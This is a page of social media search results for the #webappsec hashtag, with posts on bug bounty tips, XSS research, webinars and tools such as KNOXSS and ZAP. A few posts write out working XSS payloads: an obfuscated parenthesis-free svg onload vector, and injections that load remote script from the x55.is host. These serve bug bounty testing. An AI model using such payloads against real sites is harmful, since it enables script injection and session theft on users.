#webappsec search results
BypaXSS - The Brute Art of Bypass Slides from the @BugBountyArg @ekoparty 2025 talk #XSS #Bypass #WebAppSec docs.google.com/presentation/d…
🚀 Day 2 of 30: 🛠 - Identify Target Subdomains! Start with tools like - Facebook certificate transparency - Google certificate transparency - Findomain - subjack etc. 🔍 These tools save you time by gathering data from multiple sources. #WebAppSec #bugbountytips #bugbounty…
Here's my research about Python dirty Arbitrary File Write to RCE via overwriting shared object files or overwriting bytecode files. Enjoy! siunam321.github.io/research/pytho… #Research #WebAppSec
Don't Underestimate HTTP Desync Attacks! HTTP Request Smuggling can lead to cache poisoning, XSS, and more. Make sure you know how to handle such vulnerabilities to keep your applications safe! #CyberSecurity #WebAppSec
Mind the Headers: HTTP Security Headers (X-Frame-Options, X-Content-Type-Options, etc.) are crucial for defending against various attacks. Ensure your web app is fortified! #WebAppSec
Today, I have a great resource reminder - which I have shared before - that I believe will be very useful for those who are improving themselves in the field of Web Application Security❗️🤓 Don't forget to add it to your bookmarks.🌸 Link: media.licdn.com/dms/document/m… #webappsec
When going for Blind #XSS attempts, it's better to use a polyglot since we don't know the context of the injection in advance. Just saying. 😎 #WebAppSec #BugBounty #PenTesting
You have to be really good manually in order to beat KNOXSS testing 1000's of URLs automatically for every possible #XSS scenario it can detect and prove. 😊 Those XSS scenarios. 👇 knoxss.pro/?page_id=766 #WebAppSec #BugBounty #PenTesting
According to my VM update this morning @zaproxy 2.16.0 is now available on @kalilinux #DAST #PenTest #WebAppSec #AppSec #RedTeam #PurpleTeam
🛠️ Webinar — Writing Your First Burp Extension 📅 28 Aug 2025 | 🕘 9–10 PM 🎤 Speaker: Marcus (a.k.a benkyou) 🔗 Join: linkedin.com/feed/update/ur… #CyberSecurity #BurpSuite #WebAppSec #CTF #Webinar
Get serious about #XSS! Sign up or upgrade. knoxss.pro - built for pros. #WebAppSec #BugBounty #Pentesting
⚡ Webinar — Next.js Middleware Bypass & How to Detect It 📅 29 Sept 2025 | 🕘 9–10 PM 🎤 Speaker: @takeptoto 🔗 meet.google.com/tza-umrb-you #CyberSecurity #Nextjs #WebAppSec #CTF #Webinar
Here's my attempted research in PHP class pollution! Although I couldn't escape the object context and pollute other classes, it's still interesting that we can pollute the object's attributes and associative array's keys. siunam321.github.io/research/attem… #Research #WebAppSec
I learned how web apps work behind the scenes (from HTML/CSS/JS to servers & databases) and how vulnerabilities like SQL Injection, XSS, & CSRF can expose critical systems. academy.hackthebox.com/achievement/21… #CyberSecurity #OWASP #WebAppSec #CloudSecurity #hackthebox #htbacademy
A real hunter: coffee for breakfast, a PoC for lunch, and a confirmed bounty email in the evening 💻☕️📬 #BugBounty #WebAppSec
SessionReaper in Magento hijacks live shopper sessions, stealing carts and credentials. Patch now and enforce secure session IDs. malwarebytes.com/blog/news/2025… #infosec #Magento #WebAppSec
If HttpOnly or Secure flags are missing, session theft becomes easier. #WebAppSec 🍪
Talking about #SSRF, I just got an idea to add SSRF-based #XSS to @KN0X55 ! It's coming in the update next week most probably. #WebAppSec #BugBounty #PenTesting
XSS Without Parentheses location=tagName <JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName> PoC: x55.is/brutelogic/gym… knoxss.pro - #XSS made easy. Try it now! #WebAppSec #PenTesting #BugBounty
🔟 Server-Side Request Forgery (SSRF) ➡️ Attackers trick servers into making malicious requests. 🔑 Validate URLs, restrict network access, use allowlists. #SSRF #WebAppSec
Upload forms seem basic but are potential goldmines for attackers. The Upload Vulnerabilities room on @RealTryHackMe showed how easily malicious files bypass basic filters. A simple profile picture turning into remote code execution was mind-blowing. #UploadVulns #WebAppSec #RCE
🏆 KNOXSS September 2025 Giveaway 🏆 ➡️ Follow, like and share! 😍 ➡️ 1 Month Pro access for 3 winners on Friday 5th Good luck! 🤞 Check what only KNOXSS can find for you: knoxss.pro/?page_id=766 knoxss.pro - try it now! #WebAppSec #BugBounty #PenTesting
Improve your #XSS PoCs w/ a remote call to our X55.is domain! ➡️ Replacing alert(1) '-import('//X55.is')-' <Svg OnLoad=import('//X55.is')> ➡️ As href/src attribute <Base Href=//X55.is> <Script Src=//X55.is> ➡️ Jumping to # for custom JS x55.is/brutelogic/gym…
x55.is
XSS Gym - Train your XSS Muscles
More than 30 different XSS cases to play with, show and share XSS Proofs-of-Concept (PoCs).
Courtesy of @psiinon a performance fix for @zaproxy Auth Helper was released earlier today. #AppSec #WebAppSec #DevSecOps #DAST
Don't miss any of our #XSS tips and tricks, bypasses, memes, promos and coupons. 🤓 Hit the 🔔 in our profile page like below! #WebAppSec #BugBounty #PenTesting
There are several ways to test for #XSS that can be done manually but it is time expensive and very prone to be forgotten in a proper security assessment. Try knoxss.me #WebAppSec #PenTesting #BugBounty